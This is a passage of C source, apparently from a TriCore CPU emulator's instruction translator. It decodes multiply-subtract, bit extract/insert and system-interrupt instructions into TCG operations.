tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, 32); break; case OPC2_32_RRR1_MSUB_Q_64: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_msub64_q(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n); break; case OPC2_32_RRR1_MSUB_Q_32_L: tcg_gen_ext16s_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r2]); gen_msub32_q(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], temp, n, 16); break; case OPC2_32_RRR1_MSUB_Q_64_L: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); tcg_gen_ext16s_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r2]); gen_msub64_q(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], temp, n); break; case OPC2_32_RRR1_MSUB_Q_32_U: tcg_gen_sari_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r2], 16); gen_msub32_q(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], temp, n, 16); break; case OPC2_32_RRR1_MSUB_Q_64_U: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); tcg_gen_sari_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r2], 16); gen_msub64_q(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], temp, n); break; case OPC2_32_RRR1_MSUB_Q_32_LL: tcg_gen_ext16s_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r1]); tcg_gen_ext16s_tl(tcg_ctx, temp2, tcg_ctx->cpu_gpr_d[r2]); gen_m16sub32_q(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], temp, temp2, n); break; case OPC2_32_RRR1_MSUB_Q_64_LL: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); tcg_gen_ext16s_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r1]); tcg_gen_ext16s_tl(tcg_ctx, temp2, tcg_ctx->cpu_gpr_d[r2]); gen_m16sub64_q(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], temp, temp2, n); break; case OPC2_32_RRR1_MSUB_Q_32_UU: tcg_gen_sari_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r1], 16); tcg_gen_sari_tl(tcg_ctx, temp2, tcg_ctx->cpu_gpr_d[r2], 16); gen_m16sub32_q(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], temp, temp2, n); break; case OPC2_32_RRR1_MSUB_Q_64_UU: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); tcg_gen_sari_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r1], 16); tcg_gen_sari_tl(tcg_ctx, temp2, tcg_ctx->cpu_gpr_d[r2], 16); gen_m16sub64_q(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], temp, temp2, n); break; case OPC2_32_RRR1_MSUBS_Q_32: gen_msubs32_q(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, 32); break; case OPC2_32_RRR1_MSUBS_Q_64: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_msubs64_q(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n); break; case OPC2_32_RRR1_MSUBS_Q_32_L: tcg_gen_ext16s_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r2]); gen_msubs32_q(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], temp, n, 16); break; case OPC2_32_RRR1_MSUBS_Q_64_L: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); tcg_gen_ext16s_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r2]); gen_msubs64_q(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], temp, n); break; case OPC2_32_RRR1_MSUBS_Q_32_U: tcg_gen_sari_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r2], 16); gen_msubs32_q(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], temp, n, 16); break; case OPC2_32_RRR1_MSUBS_Q_64_U: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); tcg_gen_sari_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r2], 16); gen_msubs64_q(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], temp, n); break; case OPC2_32_RRR1_MSUBS_Q_32_LL: tcg_gen_ext16s_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r1]); tcg_gen_ext16s_tl(tcg_ctx, temp2, tcg_ctx->cpu_gpr_d[r2]); gen_m16subs32_q(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], temp, temp2, n); break; case OPC2_32_RRR1_MSUBS_Q_64_LL: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); tcg_gen_ext16s_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r1]); tcg_gen_ext16s_tl(tcg_ctx, temp2, tcg_ctx->cpu_gpr_d[r2]); gen_m16subs64_q(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], temp, temp2, n); break; case OPC2_32_RRR1_MSUBS_Q_32_UU: tcg_gen_sari_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r1], 16); tcg_gen_sari_tl(tcg_ctx, temp2, tcg_ctx->cpu_gpr_d[r2], 16); gen_m16subs32_q(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], temp, temp2, n); break; case OPC2_32_RRR1_MSUBS_Q_64_UU: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); tcg_gen_sari_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r1], 16); tcg_gen_sari_tl(tcg_ctx, temp2, tcg_ctx->cpu_gpr_d[r2], 16); gen_m16subs64_q(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], temp, temp2, n); break; case OPC2_32_RRR1_MSUBR_H_64_UL: CHECK_REG_PAIR(r3); gen_msubr64_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, 2); break; case OPC2_32_RRR1_MSUBRS_H_64_UL: CHECK_REG_PAIR(r3); gen_msubr64s_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, 2); break; case OPC2_32_RRR1_MSUBR_Q_32_LL: tcg_gen_ext16s_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r1]); tcg_gen_ext16s_tl(tcg_ctx, temp2, tcg_ctx->cpu_gpr_d[r2]); gen_msubr_q(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], temp, temp2, n); break; case OPC2_32_RRR1_MSUBR_Q_32_UU: tcg_gen_sari_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r1], 16); tcg_gen_sari_tl(tcg_ctx, temp2, tcg_ctx->cpu_gpr_d[r2], 16); gen_msubr_q(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], temp, temp2, n); break; case OPC2_32_RRR1_MSUBRS_Q_32_LL: tcg_gen_ext16s_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r1]); tcg_gen_ext16s_tl(tcg_ctx, temp2, tcg_ctx->cpu_gpr_d[r2]); gen_msubrs_q(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], temp, temp2, n); break; case OPC2_32_RRR1_MSUBRS_Q_32_UU: tcg_gen_sari_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r1], 16); tcg_gen_sari_tl(tcg_ctx, temp2, tcg_ctx->cpu_gpr_d[r2], 16); gen_msubrs_q(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], temp, temp2, n); break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } tcg_temp_free(tcg_ctx, temp); tcg_temp_free(tcg_ctx, temp2); } static void decode_rrr1_msubad_h(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t op2; uint32_t r1, r2, r3, r4, n; op2 = MASK_OP_RRR1_OP2(ctx->opcode); r1 = MASK_OP_RRR1_S1(ctx->opcode); r2 = MASK_OP_RRR1_S2(ctx->opcode); r3 = MASK_OP_RRR1_S3(ctx->opcode); r4 = MASK_OP_RRR1_D(ctx->opcode); n = MASK_OP_RRR1_N(ctx->opcode); switch (op2) { case OPC2_32_RRR1_MSUBAD_H_32_LL: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_msubad_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_LL); break; case OPC2_32_RRR1_MSUBAD_H_32_LU: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_msubad_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_LU); break; case OPC2_32_RRR1_MSUBAD_H_32_UL: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_msubad_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_UL); break; case OPC2_32_RRR1_MSUBAD_H_32_UU: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_msubad_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_UU); break; case OPC2_32_RRR1_MSUBADS_H_32_LL: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_msubads_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_LL); break; case OPC2_32_RRR1_MSUBADS_H_32_LU: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_msubads_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_LU); break; case OPC2_32_RRR1_MSUBADS_H_32_UL: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_msubads_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_UL); break; case OPC2_32_RRR1_MSUBADS_H_32_UU: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_msubads_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_UU); break; case OPC2_32_RRR1_MSUBADM_H_64_LL: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_msubadm_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_LL); break; case OPC2_32_RRR1_MSUBADM_H_64_LU: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_msubadm_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_LU); break; case OPC2_32_RRR1_MSUBADM_H_64_UL: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_msubadm_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_UL); break; case OPC2_32_RRR1_MSUBADM_H_64_UU: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_msubadm_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_UU); break; case OPC2_32_RRR1_MSUBADMS_H_64_LL: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_msubadms_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_LL); break; case OPC2_32_RRR1_MSUBADMS_H_64_LU: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_msubadms_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_LU); break; case OPC2_32_RRR1_MSUBADMS_H_64_UL: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_msubadms_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_UL); break; case OPC2_32_RRR1_MSUBADMS_H_64_UU: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_msubadms_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_UU); break; case OPC2_32_RRR1_MSUBADR_H_16_LL: gen_msubadr32_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_LL); break; case OPC2_32_RRR1_MSUBADR_H_16_LU: gen_msubadr32_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_LU); break; case OPC2_32_RRR1_MSUBADR_H_16_UL: gen_msubadr32_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_UL); break; case OPC2_32_RRR1_MSUBADR_H_16_UU: gen_msubadr32_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_UU); break; case OPC2_32_RRR1_MSUBADRS_H_16_LL: gen_msubadr32s_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_LL); break; case OPC2_32_RRR1_MSUBADRS_H_16_LU: gen_msubadr32s_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_LU); break; case OPC2_32_RRR1_MSUBADRS_H_16_UL: gen_msubadr32s_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_UL); break; case OPC2_32_RRR1_MSUBADRS_H_16_UU: gen_msubadr32s_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_UU); break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } } /* RRRR format */ static void decode_rrrr_extract_insert(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t op2; int r1, r2, r3, r4; TCGv tmp_width, tmp_pos; r1 = MASK_OP_RRRR_S1(ctx->opcode); r2 = MASK_OP_RRRR_S2(ctx->opcode); r3 = MASK_OP_RRRR_S3(ctx->opcode); r4 = MASK_OP_RRRR_D(ctx->opcode); op2 = MASK_OP_RRRR_OP2(ctx->opcode); tmp_pos = tcg_temp_new(tcg_ctx); tmp_width = tcg_temp_new(tcg_ctx); switch (op2) { case OPC2_32_RRRR_DEXTR: tcg_gen_andi_tl(tcg_ctx, tmp_pos, tcg_ctx->cpu_gpr_d[r3], 0x1f); if (r1 == r2) { tcg_gen_rotl_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r1], tmp_pos); } else { tcg_gen_shl_tl(tcg_ctx, tmp_width, tcg_ctx->cpu_gpr_d[r1], tmp_pos); tcg_gen_subfi_tl(tcg_ctx, tmp_pos, 32, tmp_pos); tcg_gen_shr_tl(tcg_ctx, tmp_pos, tcg_ctx->cpu_gpr_d[r2], tmp_pos); tcg_gen_or_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r4], tmp_width, tmp_pos); } break; case OPC2_32_RRRR_EXTR: case OPC2_32_RRRR_EXTR_U: CHECK_REG_PAIR(r3); tcg_gen_andi_tl(tcg_ctx, tmp_width, tcg_ctx->cpu_gpr_d[r3+1], 0x1f); tcg_gen_andi_tl(tcg_ctx, tmp_pos, tcg_ctx->cpu_gpr_d[r3], 0x1f); tcg_gen_add_tl(tcg_ctx, tmp_pos, tmp_pos, tmp_width); tcg_gen_subfi_tl(tcg_ctx, tmp_pos, 32, tmp_pos); tcg_gen_shl_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r1], tmp_pos); tcg_gen_subfi_tl(tcg_ctx, tmp_width, 32, tmp_width); if (op2 == OPC2_32_RRRR_EXTR) { tcg_gen_sar_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4], tmp_width); } else { tcg_gen_shr_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4], tmp_width); } break; case OPC2_32_RRRR_INSERT: CHECK_REG_PAIR(r3); tcg_gen_andi_tl(tcg_ctx, tmp_width, tcg_ctx->cpu_gpr_d[r3+1], 0x1f); tcg_gen_andi_tl(tcg_ctx, tmp_pos, tcg_ctx->cpu_gpr_d[r3], 0x1f); gen_insert(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], tmp_width, tmp_pos); break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } tcg_temp_free(tcg_ctx, tmp_pos); tcg_temp_free(tcg_ctx, tmp_width); } /* RRRW format */ static void decode_rrrw_extract_insert(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t op2; int r1, r2, r3, r4; int32_t width; TCGv temp, temp2; op2 = MASK_OP_RRRW_OP2(ctx->opcode); r1 = MASK_OP_RRRW_S1(ctx->opcode); r2 = MASK_OP_RRRW_S2(ctx->opcode); r3 = MASK_OP_RRRW_S3(ctx->opcode); r4 = MASK_OP_RRRW_D(ctx->opcode); width = MASK_OP_RRRW_WIDTH(ctx->opcode); temp = tcg_temp_new(tcg_ctx); switch (op2) { case OPC2_32_RRRW_EXTR: tcg_gen_andi_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r3], 0x1f); tcg_gen_addi_tl(tcg_ctx, temp, temp, width); tcg_gen_subfi_tl(tcg_ctx, temp, 32, temp); tcg_gen_shl_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r1], temp); tcg_gen_sari_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4], 32 - width); break; case OPC2_32_RRRW_EXTR_U: if (width == 0) { tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r4], 0); } else { tcg_gen_andi_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r3], 0x1f); tcg_gen_shr_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r1], temp); tcg_gen_andi_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4], ~0u >> (32-width)); } break; case OPC2_32_RRRW_IMASK: temp2 = tcg_temp_new(tcg_ctx); tcg_gen_andi_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r3], 0x1f); tcg_gen_movi_tl(tcg_ctx, temp2, (1 << width) - 1); tcg_gen_shl_tl(tcg_ctx, temp2, temp2, temp); tcg_gen_shl_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r2], temp); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_gpr_d[r4+1], temp2); tcg_temp_free(tcg_ctx, temp2); break; case OPC2_32_RRRW_INSERT: temp2 = tcg_temp_new(tcg_ctx); tcg_gen_movi_tl(tcg_ctx, temp, width); tcg_gen_andi_tl(tcg_ctx, temp2, tcg_ctx->cpu_gpr_d[r3], 0x1f); gen_insert(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], temp, temp2); tcg_temp_free(tcg_ctx, temp2); break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } tcg_temp_free(tcg_ctx, temp); } /* SYS Format*/ static void decode_sys_interrupts(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t op2; uint32_t r1; TCGLabel *l1; TCGv tmp; op2 = MASK_OP_SYS_OP2(ctx->opcode); r1 = MASK_OP_SYS_S1D(ctx->opcode); switch (op2) { case OPC2_32_SYS_DEBUG: /* raise EXCP_DEBUG */ break; case OPC2_32_SYS_DISABLE: tcg_gen_andi_tl(tcg_ctx, tcg_ctx->cpu_ICR, tcg_ctx->cpu_ICR, ~MASK_ICR_IE_1_3); break; case OPC2_32_SYS_DSYNC: break; case OPC2_32_SYS_ENABLE: tcg_gen_ori_tl(tcg_ctx, tcg_ctx->cpu_ICR, tcg_ctx->cpu_ICR, MASK_ICR_IE_1_3); break; case OPC2_32_SYS_ISYNC: break; case OPC2_32_SYS_NOP: break; case OPC2_32_SYS_RET: gen_compute_branch(ctx, op2, 0, 0, 0, 0); break; case OPC2_32_SYS_FRET: gen_fret(ctx); break; case OPC2_32_SYS_RFE: gen_helper_rfe(tcg_ctx, tcg_ctx->cpu_env); tcg_gen_exit_tb(tcg_ctx, NULL, 0); ctx->base.is_jmp = DISAS_NORETURN; break; case OPC2_32_SYS_RFM: if ((ctx->hflags & TRICORE_HFLAG_KUU) == TRICORE_HFLAG_SM) { tmp = tcg_temp_new(tcg_ctx); l1 = gen_new_label(tcg_ctx); tcg_gen_ld32u_tl(tcg_ctx, tmp, tcg_ctx->cpu_env, offsetof(CPUTriCoreState, DBGSR)); tcg_gen_andi_tl(tcg_ctx, tmp, tmp, MASK_DBGSR_DE); tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_NE, tmp, 1, l1); gen_helper_rfm(tcg_ctx, tcg_ctx->cpu_env); gen_set_label(tcg_ctx, l1); tcg_gen_exit_tb(tcg_ctx, NULL, 0); ctx->base.is_jmp = DISAS_NORETURN; tcg_temp_free(tcg_ctx, tmp); } else { /* generate privilege trap */ } break; case OPC2_32_SYS_RSLCX: gen_helper_rslcx(tcg_ctx, tcg_ctx->cpu_env); break; case OPC2_32_SYS_SVLCX: gen_helper_svlcx(tcg_ctx, tcg_ctx->cpu_env); break; case OPC2_32_SYS_RESTORE: if (has_feature(ctx, TRICORE_FEATURE_16)) { if ((ctx->hflags & TRICORE_HFLAG_KUU) == TRICORE_HFLAG_SM || (ctx->hflags & TRICORE_HFLAG_KUU) == TRICORE_HFLAG_UM1) { tcg_gen_deposit_tl(tcg_ctx, tcg_ctx->cpu_ICR, tcg_ctx->cpu_ICR, tcg_ctx->cpu_gpr_d[r1], 8, 1); } /* else raise privilege trap */ } else { generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } break; case OPC2_32_SYS_TRAPSV: l1 = gen_new_label(tcg_ctx); tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_GE, tcg_ctx->cpu_PSW_SV, 0, l1); generate_trap(ctx, TRAPC_ASSERT, TIN5_SOVF); gen_set_label(tcg_ctx, l1); break; case OPC2_32_SYS_TRAPV: l1 = gen_new_label(tcg_ctx); tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_GE, tcg_ctx->cpu_PSW_V, 0, l1); generate_trap(ctx, TRAPC_ASSERT, TIN5_OVF); gen_set_label(tcg_ctx, l1); break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } } static void decode_32Bit_opc(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int op1; int32_t r1, r2, r3; int32_t address, const16; int8_t b, const4; int32_t bpos; TCGv temp, temp2, temp3; op1 = MASK_OP_MAJOR(ctx->opcode); /* handle JNZ.T opcode only being 7 bit long */ if (unlikely((op1 & 0x7f) == OPCM_32_BRN_JTT)) { op1 = OPCM_32_BRN_JTT; } switch (op1) { /* ABS-format */ case OPCM_32_ABS_LDW: decode_abs_ldw(ctx); break; case OPCM_32_ABS_LDB: decode_abs_ldb(ctx); break; case OPCM_32_ABS_LDMST_SWAP: decode_abs_ldst_swap(ctx); break; case OPCM_32_ABS_LDST_CONTEXT: decode_abs_ldst_context(ctx); break; case 